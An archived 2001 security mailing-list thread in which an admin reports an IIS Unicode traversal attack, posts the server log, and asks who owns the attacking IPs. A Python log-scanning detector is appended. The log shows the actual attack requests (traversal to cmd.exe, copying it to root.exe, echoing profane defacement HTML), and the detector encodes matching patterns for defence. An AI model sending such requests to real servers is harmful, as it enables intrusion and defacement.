Security Incidents mailing list archives

RE: who's owning this ip?


From: "Matt Rowley" <matt.rowley () streampipe com>
Date: Mon, 14 May 2001 13:26:17 -0400

http://www.arin.net/cgi-bin/whois.pl
to reverse-lookup the IP for the coordinator.

--Matt

-----Original Message-----
From: Incidents Mailing List [mailto:INCIDENTS () SECURITYFOCUS COM]On
Behalf Of Thomas Springer
Sent: Tuesday, May 08, 2001 12:08 PM
To: INCIDENTS () SECURITYFOCUS COM
Subject: who's owning this ip?


We had an attacker exploiting Unicode on IIS 5 yesterday - see funny
Chinese war pages in the log below. The hacker successfully exploited the
IIS Unicode bug, created ~100 files but was still too dumb to deface the
webserver.

The attacker used 208.22.161.15 and 202.97.205.3.
I tried a trace but ended up with
 ...
 19   210 ms   211 ms   220 ms  pao1-sjc2-oc48-2.pao1.above.net [
 20   210 ms   231 ms   230 ms  208.184.129.244.cmnetcom.com.hk [
 21   200 ms   211 ms   220 ms  202.0.170.34
 22   361 ms   370 ms   411 ms  202.0.170.13
 23   370 ms   391 ms   400 ms  202.97.10.193
 24   521 ms   541 ms   551 ms  202.97.10.66
 25   581 ms   601 ms   581 ms  61.138.38.2
 26   721 ms   711 ms   671 ms  61.180.139.202
 27   341 ms   350 ms   351 ms  202.97.205.3

208.22.161.15 seems to end at
17   130 ms   130 ms   131 ms  ewr-core-02.inet.qwest.net [205.171.17.130]
18   110 ms   110 ms   111 ms  ewr-brdr-01.inet.qwest.net [205.171.17.82]
19     *        *        *     Timeout..
....

Any chance of finding out to whom the two IP addresses belong?
Any tool that copies cmd.exe to root.exe?

I liked this hack, because nothing happened and people here suddenly
developed security awareness. Hence, even the servers I begged to secure
for weeks are patched now.
BTW it's a German website - nothing to do with any Chinese-American spy
wars.

funny hackerworld...

thomas

--- IIS-Logsnip ---
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn () yahoo com cn^</html^>>.././index.asp 502 355 423 - - -
2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn () yahoo com cn^</html^>>.././index.htm 502 355 423 - - -


Thomas Springer
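An added example, not code from the thread or from either poster: a small Python detector that reads IIS W3C-style log lines like the snippet above and tags the stages Thomas describes (traversal into winnt\system32, cmd.exe execution, the copy of cmd.exe to root.exe, and follow-on root.exe requests), then groups the tags per source IP. The field layout (date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status, trailing fields ignored) is assumed from the posted lines; the names normalize_path, classify and scan are my own; the sample log is constructed (the first three entries are the posted requests re-joined, the last two are made up, one of them using an overlong UTF-8 encoding of "/" so the normalisation step has something to fold).

```python
"""Detector for the IIS traversal / cmd.exe / root.exe pattern seen in the
posted log. Example code, not from the thread; field layout is assumed."""
import re
from urllib.parse import unquote_to_bytes

# Assumed W3C field order for the posted lines; anything after sc-status is ignored.
FIELDS = ("date", "time", "c_ip", "cs_username", "s_ip", "s_port",
          "cs_method", "cs_uri_stem", "cs_uri_query", "sc_status")

# Constructed sample: three posted requests (re-joined), one benign request,
# and one made-up request using an overlong UTF-8 "/" in the traversal.
SAMPLE_LOG = """\
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\\winnt\\system32\\cmd.exe+root.exe 502 382 100 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>^<body^>>.././index.asp 502 355 423 - - -
2001-05-07 12:29:10 192.0.2.7 - 10.253.6.15 80 GET /index.asp - 200 1200 80 - - -
2001-05-07 12:29:30 192.0.2.9 - 10.253.6.15 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
"""


def normalize_path(raw: str) -> str:
    """Percent-decode, fold overlong 2-byte UTF-8 forms of '/' and '\\' into a
    plain '/', treat backslash as '/', and lower-case. This is the step the
    vulnerable IIS check skipped: it compared the raw path before decoding."""
    data = unquote_to_bytes(raw)
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        # 2-byte lead (110xxxxx) followed by a continuation byte (10xxxxxx)
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            code = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if code in (0x2F, 0x5C):      # overlong '/' or '\' - a separator in disguise
                out.append(0x2F)
                i += 2
                continue
        out.append(0x2F if b == 0x5C else b)
        i += 1
    return out.decode("latin-1").lower()


def parse_line(line: str):
    """Split one W3C log line into the assumed fields; skip directives/short lines."""
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def classify(entry) -> list:
    """Tag the request with the attack stages it matches (empty list = benign)."""
    stem = normalize_path(entry["cs_uri_stem"])
    query = normalize_path(entry["cs_uri_query"].replace("+", " "))
    tags = []
    if "/../" in stem or stem.endswith("/.."):
        tags.append("traversal")
    if "/system32/cmd.exe" in stem:
        tags.append("cmd.exe")
    if re.search(r"\bcopy\b.*cmd\.exe", query):
        tags.append("cmd.exe-copy")       # the step that creates root.exe
    if stem.endswith("/root.exe"):
        tags.append("root.exe")           # follow-on use of the copied shell
    return tags


def scan(log_text: str):
    """Return (findings, per_ip): flagged lines as (c_ip, stem, status, tags)
    and, per source IP, the union of tags seen from it."""
    findings, per_ip = [], {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        tags = classify(entry)
        if tags:
            findings.append((entry["c_ip"], entry["cs_uri_stem"], entry["sc_status"], tags))
            per_ip.setdefault(entry["c_ip"], set()).update(tags)
    return findings, per_ip


if __name__ == "__main__":
    found, by_ip = scan(SAMPLE_LOG)
    for c_ip, stem, status, tags in found:
        print(f"{c_ip:15} {status} {stem} -> {', '.join(tags)}")
    for c_ip, tags in by_ip.items():
        print(f"{c_ip}: {sorted(tags)}")
```

Two points the per-IP grouping makes: the copy request in the posted log returned 502, yet the root.exe requests that follow it from the same address show it worked, so filtering these lines on sc-status alone would hide the successful stage; and the same address reaching all four tags within a second is the sequence to alert on, whatever status codes the individual requests carry.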

